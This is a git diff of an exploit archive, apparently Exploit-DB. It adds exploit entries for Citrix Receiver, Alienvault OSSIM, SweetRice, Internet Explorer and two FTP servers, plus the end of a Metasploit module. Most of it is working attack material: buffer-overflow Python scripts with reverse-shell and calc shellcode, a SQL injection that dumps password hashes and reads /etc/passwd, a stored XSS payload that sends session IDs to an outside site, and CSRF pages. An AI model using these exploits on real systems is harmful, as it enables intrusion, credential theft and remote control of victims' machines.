+
+    # pwning
+    requests = [
+      {:method => "get", :path => "/profile"},
+      {:method => "get", :path => "/item"},
+      {:method => "get", :path => "/item/$1.id#{pay}"}, # need to match this /(?:\/)(?:\$(\d)+\.)?([^\/\$]*)/g;
+    ]
+
+    post = {:requests => requests}
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(datastore['URIPATH']),
+      'ctype' => 'application/json',
+      'data'   => post.to_json
+    })
+
+    # default example app
+    if res and res.code == 200 and res.body =~ /id/
+      return true
+
+    # incase we are not targeting the default app
+    elsif res and res.code == 500 and es.body !=~ /id/
+      return true
+    end
+    return false
+  end
+
+  def start_http_server
+    @pl = generate_payload_exe
+    @elf_sent = false
+    downfile = rand_text_alpha(8+rand(8))
+    resource_uri = "\\x2f#{downfile}"
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    # do not use SSL for the attacking web server
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+
+    @service_url = "http:\\x2f\\x2f#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
+    service_url_payload = srv_host + resource_uri
+    print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
+    }})
+    datastore['SSL'] = true if ssl_restore
+    connect
+  end
+
+  def exploit
+      start_http_server
+      if send_payload
+        print_good("Injected payload")
+        # we need to delay, for the stager
+        select(nil, nil, nil, 5)
+      end
+  end
+end
\ No newline at end of file
diff --git a/platforms/multiple/local/40686.txt b/platforms/multiple/local/40686.txt
new file mode 100755
index 000000000..42c646d60
--- /dev/null
+++ b/platforms/multiple/local/40686.txt
@@ -0,0 +1,26 @@
+# thel3l
+
+# Title: Citrix Receiver/Receiver Desktop Lock 4.5 Incorrect Access Control
+# CVE: CVE-2016-9111
+# Date of Discovery: October 27 2016
+# Exploit Author: Rithwik Jayasimha
+# Author Homepage/Contact: https://thel3l.me
+# Vendor Name: Citrix
+# Vendor Homepage: https://www.citrix.com/
+# Software Link: Receiver - https://www.citrix.com/go/receiver.html
+                 Receiver Desktop Lock - https://www.citrix.com/downloads/citrix-receiver/additional-client-software/receiver-desktop-lock-45.html
+# Version: 10.6.3
+# Tested on: Windows 8.1, macOS 10.12.1 Sierra
+# Category: local
+# Vulnerability type: Incorrect Access Control
+
+
+# Description: Allows attacker with physical access to VDI to bypass authentication requirement. Citrix Receiver and/or Desktop Lock for Mac OSX and Windows suffer from a local incorrect access control.
+To exploit this:
+1. An attacker would first identify a VDI with a logged in user, which has been locked.
+2. The attacker then proceeds to disconnect the system from the network temporarily (removing and reinserting the LAN cable is enough).
+3. Citrix Receiver then proceeds to unlock the session and allows the attacker full access to the connected user's account without confirming the user's identity.
+
+# Additional Notes, References and links:
+    * This exploit is not 100% reliable - it may take a couple of tries to be able to accurately reproduce this behavior.
+    * This attack has only been attempted with physical access - it may also be possible to remotely script a restart of a network adapter to cause the same behavior.
diff --git a/platforms/php/webapps/15721.txt b/platforms/php/webapps/15721.txt
index 94f3a9a6d..c3978613e 100755
--- a/platforms/php/webapps/15721.txt
+++ b/platforms/php/webapps/15721.txt
@@ -4,5 +4,4 @@
 # Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/portfolio/14834
 # Version: 1.1.2
 
-index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and
-if(1,benchmark(5000000,md5(1)),1)
+index.php?option=com_billyportfolio&view=billyportfolio&catid=-1 and if(1,benchmark(5000000,md5(1)),1)
diff --git a/platforms/php/webapps/35965.txt b/platforms/php/webapps/35965.txt
deleted file mode 100755
index 9979c1f5f..000000000
--- a/platforms/php/webapps/35965.txt
+++ /dev/null
@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/48692/info
-
-The 'com_resman' component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
-
-http://www.example.com/index.php?option=com_resman&task=list&city=<BODY%20ONLOAD=alert("SOLVER")> 
\ No newline at end of file
diff --git a/platforms/php/webapps/40682.txt b/platforms/php/webapps/40682.txt
new file mode 100755
index 000000000..ff3f4c2f1
--- /dev/null
+++ b/platforms/php/webapps/40682.txt
@@ -0,0 +1,50 @@
+Details
+=======
+
+Product: Alienvault OSSIM/USM
+Vulnerability: PHP Object Injection
+Author: Peter Lapp, lappsec () gmail com
+CVE: CVE-2016-8580
+Vulnerable Versions: <=5.3.1
+Fixed Version: 5.3.2
+
+
+
+Vulnerability Details
+=====================
+
+A PHP object injection vulnerability exists in multiple widget files
+due to the unsafe use of the unserialize() function. The affected
+files include flow_chart.php, gauge.php, honeypot.php,
+image.php,inventory.php, otx.php, rss.php, security.php, siem.php,
+taxonomy.php, tickets.php, and url.php.
+An authenticated attacker could send a serialized PHP object to one of
+the vulnerable pages and potentially gain code execution via magic
+methods in included classes.
+
+
+
+POC
+====
+
+This benign POC injects the IDS_Report class from PHPIDS into the
+refresh parameter of image.php. The __toString method of IDS_Report is
+then executed and the output is displayed in the value of the content
+field in the response:
+
+/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}
+
+
+
+Timeline
+========
+
+08/03/16 - Reported to Vendor
+10/03/16 - Fixed in version 5.3.2
+
+
+
+References
+==========
+
+https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
diff --git a/platforms/php/webapps/40683.txt b/platforms/php/webapps/40683.txt
new file mode 100755
index 000000000..418fd6f36
--- /dev/null
+++ b/platforms/php/webapps/40683.txt
@@ -0,0 +1,46 @@
+Details
+=======
+
+Product: Alienvault OSSIM/USM
+Vulnerability: Stored XSS
+Author: Peter Lapp, lappsec () gmail com
+CVE: CVE-2016-8581
+CVSS: 3.5
+Vulnerable Versions: <=5.3.1
+Fixed Version: 5.3.2
+
+
+
+Vulnerability Details
+=====================
+
+A stored XSS vulnerability exists in the User-Agent header of the
+login process. It's possible to inject a script into that header that
+then gets executed when mousing over the User-Agent field in Settings
+-> Current Sessions.
+
+
+
+POC
+===
+
+The POC uses jQuery to send all session IDs on the "Current Sessions"
+page to an arbitrary site (Google, in this case)
+
+<script>$('#ops_table
+.ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});</script>
+
+
+
+Timeline
+========
+
+08/03/16 - Reported to Vendor
+10/03/16 - Fixed in version 5.3.2
+
+
+
+References
+==========
+
+https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
\ No newline at end of file
diff --git a/platforms/php/webapps/40684.txt b/platforms/php/webapps/40684.txt
new file mode 100755
index 000000000..a27b7ccd4
--- /dev/null
+++ b/platforms/php/webapps/40684.txt
@@ -0,0 +1,53 @@
+Details
+=======
+
+Product: Alienvault OSSIM/USM
+Vulnerability: SQL Injection
+Author: Peter Lapp, lappsec () gmail com
+CVE: CVE-2016-8582
+Vulnerable Versions: <=5.3.1
+Fixed Version: 5.3.2
+
+
+
+Vulnerability Details
+=====================
+
+A SQL injection vulnerability exists in the value parameter of
+/ossim/dashboard/sections/widgets/data/gauge.php on line 231. By
+sending a serialized array with a SQL query in the type field, it's
+possible to execute an arbitrary SQL query. The result is not
+displayed on the screen, but it can be exploited as a blind SQLi or
+have the output directed to a file and then retrieved via another
+request. Authentication is required.
+
+
+
+POC
+===
+
+This request will dump user password hashes to a file:
+
+/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D
+
+The file containing the output can then be retrieved with the following request:
+/ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123
+
+It's also possible to read the contents of any file readable by the
+mysql user by using mysql's load_file function. For example, changing
+the request to something like select load_file('/etc/passwd') .
+
+
+
+Timeline
+========
+
+08/03/16 - Reported to Vendor
+10/03/16 - Fixed in version 5.3.2
+
+
+
+References
+==========
+
+https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
\ No newline at end of file
diff --git a/platforms/php/webapps/40692.html b/platforms/php/webapps/40692.html
new file mode 100755
index 000000000..542dac14b
--- /dev/null
+++ b/platforms/php/webapps/40692.html
@@ -0,0 +1,35 @@
+<!--
+# Exploit Title: SweetRice 1.5.1 - Cross-Site Request Forgery
+# Exploit Author: Ashiyane Digital Security Team
+# Date: 03-11-2016
+# Vendor: http://www.basic-cms.org/
+# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
+# Version: 1.5.1
+# Platform: WebApp - PHP - Mysql
+
+# Exploit 1:
+-->
+<html>
+  <!-- CSRF PoC -->
+  <body>
+    <form action="http://localhost/as/?type=data&mode=sql_execute&form_mode=yes" method="POST">
+      <input type="hidden" name='sql_content' value="CREATE DATABASE testfcb">
+      <input type="submit" value="Execute" />
+      </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+<!--
+Exploit 2:
+Next send request a file with name 'SweetRice-transfer.zip' create in main directory and you can access to all of files in this url:
+http://localhost/SweetRice-transfer.zip
+-->
+<html>
+  <!-- CSRF PoC -->
+  <body>
+    <img src='http://localhost/1/as/?type=data&mode=transfer&form_type=pack'></img>
+  </body>
+</html>
diff --git a/platforms/windows/dos/40685.html b/platforms/windows/dos/40685.html
new file mode 100755
index 000000000..fdf79fcd7
--- /dev/null
+++ b/platforms/windows/dos/40685.html
@@ -0,0 +1,41 @@
+<!--
+Source: http://blog.skylined.nl/20161101001.html
+
+Synopsis
+
+A specially crafted webpage can cause Microsoft Internet Explorer 9 to reallocate a memory buffer in order to grow it in size. The original buffer will be copied to newly allocated memory and then freed. The code continues to use the freed copy of the buffer.
+
+Known affected versions, attack vectors and mitigations
+
+Microsoft Internet Explorer 9
+An attacker would need to get a target user to open a specially crafted webpage. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
+-->
+
+<!doctype html>
+<script>
+  oTextArea = document.createElement('textarea');
+  oTextArea.dataSrc = 1;
+  oTextArea.id = 1;
+  oTextArea.innerHTML = 1;
+  oTextArea.onvolumechange = 1;
+  oTextArea.style.setProperty('list-style', "url()");
+</script>
+
+
+<!--
+Analysis
+
+The CAttrArray object initially allocates a CImplAry buffer of 0x40 bytes, which can store 4 attributes. When the buffer is full, it is grown to 0x60 bytes. A new buffer is allocated at a different location in memory and the contents of the original buffer is copied there. The repro causes the code to do this, but the code continues to access the original buffer after it has been freed.
+
+Exploit
+
+If an attacker was able to cause MSIE to allocate 0x40 bytes of memory and have some control over the contents of this memory before MSIE reuses the freed memory, there is a chance that this issue could be used to execute arbitrary code. I did not attempt to write an exploit for this vulnerability myself.
+
+Timeline
+
+- April 2014: This vulnerability was found through fuzzing.
+- July 2014: This vulnerability was submitted to ZDI.
+- July 2014: ZDI reports a collision with a report by another researcher. (From the credits given by Microsoft and ZDI, I surmise that it was Peter 'corelanc0d3r' Van Eeckhoutte of Corelan who reported this issue.
+- October 2014: Microsoft release MS14-056, which addresses this issue.
+- November 2016: Details of this issue are released.
+-->
\ No newline at end of file
diff --git a/platforms/windows/dos/40691.html b/platforms/windows/dos/40691.html
new file mode 100755
index 000000000..70a00bc84
--- /dev/null
+++ b/platforms/windows/dos/40691.html
@@ -0,0 +1,36 @@
+<!--
+Source: http://blog.skylined.nl/20161102001.html
+
+Synopsis
+
+Setting the listStyleImage property of an Element object causes Microsoft Internet Explorer 11 to allocate 0x4C bytes for an "image context" structure, which contains a reference to the document object as well as a reference to the same CMarkup object as the document. When the element is removed from the document (-fragment), this image context is freed on the next "draw". However, the code continues to use the freed context almost immediately after it is freed.
+
+Known affected versions, attack vectors and mitigations
+
+Microsoft Internet Explorer 11
+An attacker would need to get a target user to open a specially crafted webpage. As far as can be determined, disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
+-->
+
+<script>
+  var oDocumentFragment = document.createDocumentFragment(),
+      oElement = document.createElement('x');
+  oDocumentFragment.appendChild(oElement);
+  oElement.style.listStyleImage = "url(x)";
+  oDocumentFragment.removeChild(oElement);
+</script>
+
+<!--
+Exploit
+
+I tried a few tricks to see if there was an easy way to reallocate the freed memory before the reuse, but was unable to find anything. I do not know if there is a way to cause further reuse of the freed memory later on in the code. Running the repro as-is without page heap does not appear to trigger crashes. It does not appear that there is enough time between the free and reuse to exploit this issue.
+
+Timeline
+
+May 2014: This vulnerability was found through fuzzing.
+June 2014: This vulnerability was submitted to ZDI.
+July 2014: ZDI rejects the submission.
+November 2016: The issue does not reproduce in the latest build of MSIE 11.
+November 2016: Details of this issue are released.
+
+Unfortunately, my records of what happened after ZDI rejected the issue are patchy. It appears that I did not pursue reporting the issue anywhere else, but Microsoft does appear to have patched the issue, as I can no longer reproduce it.
+-->
\ No newline at end of file
diff --git a/platforms/windows/remote/40680.py b/platforms/windows/remote/40680.py
new file mode 100755
index 000000000..cdf9f1002
--- /dev/null
+++ b/platforms/windows/remote/40680.py
@@ -0,0 +1,56 @@
+#!/usr/bin/env python      
+# -*- coding: utf-8 -*-
+
+# Exploit Title:  PCMan's FTP Server 2.0.7 UMASK Command Buffer Overflow Exploit
+# Date:           1/11/2016
+# Exploit Author: Eagleblack
+# Tested on:      Windows XP Profesional SP3 Spanish version x86
+# CVE :           N/A
+
+
+import socket 
+ret="\x10\xb3\x3d\x7e" #USER32 this dll have a jump to ESP stack pointer
+
+#Metasploit shellcode: 
+#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
+
+shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
+"\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
+"\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
+"\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
+"\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
+"\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
+"\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
+"\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
+"\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
+"\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
+"\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
+"\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
+"\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
+"\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
+"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
+"\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
+"\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
+"\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
+"\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
+"\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
+"\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
+"\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
+"\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
+"\x33\x93\xbd\x45\x33\xb6") 
+
+buffer =  '\x41'* 2006 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 2006
+print "Sending Buffer"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
+connect = s.connect(('192.168.1.13',21))              #IP address and port (21) from the target
+s.recv(1024)                                          #FTPBanner
+s.send('USER anonymous\r\n')                          #Sending USER
+s.recv(1024) 
+s.send('PASS \r\n')                                   #Sending Password (Null password)
+s.recv(1024)
+s.send('UMASK' + buffer +'\r\n')
+s.close()
+
+
+
diff --git a/platforms/windows/remote/40681.py b/platforms/windows/remote/40681.py
new file mode 100755
index 000000000..cb9be6753
--- /dev/null
+++ b/platforms/windows/remote/40681.py
@@ -0,0 +1,55 @@
+import socket
+import sys
+import os
+
+print '''
+
+                ##############################################
+                #    Created: ScrR1pTK1dd13                  #
+                #    Name: Greg Priest                       #
+                #    Mail: ScrR1pTK1dd13.slammer@gmail.com   # 
+                ##############################################
+
+# Exploit Title: FreefloatFTPserver1.0_dir_command_remotecode_exploit
+# Date: 2016.11.02
+# Exploit Author: Greg Priest
+# Version: FreefloatFTPserver1.0
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+ip = raw_input("Target ip: ")
+port = 21
+overflow = 'A' * 247
+eip =  '\xF4\xAF\xEA\x75' + '\x90' * 10
+#shellcode calc.exe
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+remotecode = overflow + eip + shellcode + '\r\n'
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect((ip ,port))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASSW hacker@hacker.net\r\n')
+s.recv(1024)
+print '''
+Successfull Exploitation!
+'''
+message = 'dir ' + remotecode 
+s.send(message)
+s.recv(1024)
+s.close